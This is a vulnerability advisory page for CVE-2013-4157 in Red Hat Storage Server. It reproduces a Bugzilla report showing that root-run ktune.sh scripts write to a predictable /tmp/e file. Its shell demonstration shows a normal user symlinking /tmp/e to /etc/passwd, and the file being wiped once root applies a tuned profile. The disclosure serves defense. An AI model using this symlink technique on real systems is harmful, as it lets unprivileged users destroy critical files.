CVE-2013-4157

First published: Sat Jul 20 2013(Updated: )

Gowrishankar Rajaiyan (grajaiya) reports: I found a potential security issue with redhat-storage-server-1.7.3-2.el6rhs.noarch previously known as appliance-base-1.7.3-1.el6rhs while verifying <a class="bz_bug_link bz_secure " title="" href="show_bug.cgi?id=910566">https://bugzilla.redhat.com/show_bug.cgi?id=910566</a>. [Open URL] This issue also exists in the latest released version of RHS <a href="https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689">https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689</a> [Open URL] Description: As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh and /etc/tune-profiles/rhs-virtualization/ktune.sh &lt;snip&gt; for d in `find /var/lib/glusterd/vols -name bricks -type d 2&gt;/tmp/e ` ; do &lt;/snip&gt; A file "e" is created in /tmp directory. This information is public at <a class="bz_bug_link bz_secure " title="" href="show_bug.cgi?id=910566#c13">https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13</a> [Open URL] (I set it to private now, not sure if that helps). So any normal user can create a softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as root user, hence, exposes a security loop hole where in a normal user can wipe out /etc/passwd. Please guide on how to proceed from here. A demonstration is as follows: As normal user: [shanks@localhost ~]$ id uid=500(shanks) gid=500(shanks) groups=500(shanks) [shanks@localhost ~]$ cd /tmp/ [shanks@localhost tmp]$ ln -s /etc/passwd e [shanks@localhost tmp]$ ls -l total 4 lrwxrwxrwx 1 shanks shanks 11 Jul 19 12:49 e -&gt; /etc/passwd -rwx------. 1 root root 391 Jul 19 09:04 ks-script-QuMjt3 -rwxr-xr-x. 1 root root 0 Jul 19 09:04 ks-script-QuMjt3.log -rw------- 1 root root 0 Jul 19 09:04 tmp.ta4401DZd7 -rw-------. 1 root root 0 Jul 19 08:54 yum.log [shanks@localhost tmp]$ As root: [root@localhost ~]# tuned-adm profile rhs-high-throughput Reverting to saved sysctl settings: [ OK ] Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on brick devices: [ OK ] Reverting to cfq elevator: dm-0 dm-1 [ OK ] Stopping tuned: [ OK ] Switching to profile 'rhs-high-throughput' Applying ktune sysctl settings: /etc/ktune.d/tunedadm.conf: [ OK ] Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on brick devices: [ OK ] Applying sysctl settings from /etc/sysctl.conf Applying deadline elevator: dm-0 dm-1 [ OK ] Starting tuned: 'import site' failed; use -v for traceback [ OK ] [root@localhost ~]# cat /etc/passwd [root@localhost ~]#

Credit: secalert@redhat.com

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

• collector/redhat-bugzilla
• alias/CVE-2013-4157
• agent/last-modified-date
• agent/first-publish-date
• agent/type
• agent/references
• agent/remedy
• agent/severity
• agent/weakness
• agent/author
• agent/tags
• agent/description
• agent/softwarecombine
• agent/event
• collector/nvd-index
• agent/software-canonical-lookup-request
• vendor/redhat
• canonical/red hat storage server
• version/red hat storage server/2.0